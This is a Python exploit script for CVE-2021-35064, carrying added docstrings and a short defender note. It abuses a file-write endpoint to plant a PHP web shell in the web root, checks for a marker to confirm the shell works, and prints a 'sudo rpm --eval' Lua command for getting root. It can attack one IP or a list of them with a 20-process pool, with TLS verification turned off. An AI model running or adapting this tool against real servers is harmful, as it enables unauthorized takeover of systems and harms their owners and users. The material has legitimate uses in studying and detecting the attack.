import os
import base64
import requests
import argparse
import sys, urllib3
import concurrent.futures
from rich.console import Console

# Silence the InsecureRequestWarning that every verify=False request below would
# otherwise emit; TLS certificate validation is disabled for all traffic here.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
console = Console()

# base64-encoded ASCII-art banner; decoded and printed by main().
banner=("ICAgX19fX19fICAgICBfX19fX19fICAgICBfX19fICAgX19fIF9fX18gIF8gICAgICBfX19fX19f"
"X18gICBfX18gICBfXyAgIF8gIF8gICAKICAvIF9fX1wgXCAgIC8gLyBfX19ffCAgIHxfX18gXCAv"
"IF8gXF9fXyBcLyB8ICAgIHxfX18gLyBfX198IC8gXyBcIC8gL18gfCB8fCB8ICAKIHwgfCAgICBc"
"IFwgLyAvfCAgX3wgX19fX18gX18pIHwgfCB8IHxfXykgfCB8X19fX18gfF8gXF9fXyBcfCB8IHwg"
"fCAnXyBcfCB8fCB8XyAKIHwgfF9fXyAgXCBWIC8gfCB8X198X19fX18vIF9fL3wgfF98IC8gX18v"
"fCB8X19fX198X18pIHxfXykgfCB8X3wgfCAoXykgfF9fICAgX3wKICBcX19fX3wgIFxfLyAgfF9f"
"X19ffCAgIHxfX19fX3xcX19fL19fX19ffF98ICAgIHxfX19fL19fX18vIFxfX18vIFxfX18vICAg"
"fF98ICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
"ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKCQkgICAgICAgICBDb2RlZCBCeSBWYWxlbnRp"
"biBMb2JzdGVpbgo=" )


def exploit(host):
    """Run the two-step check against one host and log the outcome.

    Args:
        host: IP address or hostname (no scheme); used verbatim in URLs.

    Note: writeFile() swallows its own request errors, but getResult() has no
    exception handling, so a connection failure in the second step propagates
    out of this function (and, under the process pool in main(), is never
    surfaced because no future's .result() is read).
    """
    writeFile(host)
    console.log(getResult(host))


def writeFile(host):
    """POST to ajaxPages/writeBrowseFilePathAjax.php with a webroot path.

    The request body carries ``associateFileName=/var/www/html/balgo.php`` and
    an empty ``radioBtnVal``. TLS verification is disabled (verify=False) and
    the request times out after 2 seconds. The four caught request exception
    types are all reported with the same "Request timed out" message, so the
    log line does not distinguish a timeout from a connection or SSL failure.

    Defender note: a POST to this endpoint whose associateFileName points into
    the web root, followed by GETs for balgo.php / pwny.php, is the observable
    pattern of this script.

    Args:
        host: IP address or hostname interpolated into the Host header and URL.
    """
    try:
        headers = {
            "Host": f"{host}",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
            "Accept": "text/html, */*",
            "Accept-Language": "en-GB,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "X-Requested-With": "XMLHttpRequest",
            "Sec-Fetch-Dest": "empty",
            "Sec-Fetch-Mode": "cors",
            "Sec-Fetch-Site": "same-origin",
            "Sec-Gpc": "1",
            "Te": "trailers",
            "Connection": "close"
        }
        # write php web shell into the Apache web directory
        data = { "radioBtnVal":'', "associateFileName": "/var/www/html/balgo.php"}
        requests.post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data, timeout=2, verify=False)
    except (requests.exceptions.Timeout,requests.exceptions.ConnectionError,requests.exceptions.InvalidURL,requests.exceptions.SSLError):
        # Same message for every caught exception type (not only Timeout).
        console.log(f"[red][!] Request timed out [/red] http://{host}/")


def getResult(host):
    """Fetch balgo.php then pwny.php and build a rich-markup status string.

    Success is decided solely by the marker string 'chocapik' appearing in the
    body of /pwny.php. The response of the first GET (``dropper_exec``) is
    never read. Unlike writeFile(), this function has no try/except, so any
    requests exception raised by either GET propagates to the caller.

    Args:
        host: IP address or hostname used to build both URLs.

    Returns:
        A rich-markup string: a green "Exploited" line (plus a second line)
        when the marker is found, otherwise a red "Fail" line.
    """
    # query the web shell, using rpm as sudo for root privileges
    dropper_exec = requests.get(f"https://{host}/balgo.php", timeout=2,verify=False)
    file = requests.get(f"https://{host}/pwny.php", timeout=2, verify=False)
    #sudo rpm --eval '%{lua:os.execute(\"" + cmd + "\")}
    pageText = file.text
    if 'chocapik' in pageText:
        result = f"[green][<>] Exploited | Shell : [bold]https://{host}/pwny.php[/bold][/green]\n"
        result += "[green][<>] For root : sudo rpm --eval '%{lua:os.execute(\"\")}'[/green]"
    else:
        result = f"[red][!] Fail [/red] http://{host}/"
    return result


def main():
    """CLI entry point: print the banner, parse -i / -f, dispatch to exploit().

    Behaviour as written:
      * neither -i nor -f      -> print help and sys.exit()
      * -i only                -> exploit() once, in-process
      * -f only                -> read the file (path resolved relative to the
                                  current working directory) and submit one
                                  exploit() call per line to a 20-worker
                                  ProcessPoolExecutor; wait for all futures
      * both -i and -f         -> neither branch runs; falls through to exit()

    The executor is never shut down explicitly (no ``with`` / ``shutdown()``),
    the ``status`` context variable is unused, and the final ``exit()`` is the
    site-provided builtin rather than sys.exit().
    """
    print("\n" + base64.b64decode(banner).decode("utf-8"))
    parser = argparse.ArgumentParser(prog="CVE-2021-35064.py", description="Example : python3 %(prog)s -i 127.0.0.1")
    parser.add_argument("-i", help="IP address (not url)")
    parser.add_argument("-f", help="IP file")
    args = parser.parse_args()
    if not args.f and not args.i:
        parser.print_help()
        sys.exit()
    if args.i and not args.f:
        exploit(args.i)
    if args.f and not args.i:
        # One target per line; the file path is joined to the CWD by string
        # formatting, so an absolute -f value would produce a double-rooted path.
        with open(f"{os.getcwd()}/{args.f}",'r') as f:
            ip_list = f.readlines()
        with console.status("[bold green]Exploiting...", spinner='aesthetic') as status:
            executor = concurrent.futures.ProcessPoolExecutor(20)
            # .strip() already removes the trailing newline; the split is redundant.
            futures = [executor.submit(exploit, ip.strip().split('\n')[0]) for ip in ip_list]
            # Exceptions raised inside workers stay inside the futures; they are
            # never inspected here.
            concurrent.futures.wait(futures)
    exit()


if __name__ == "__main__":
    main()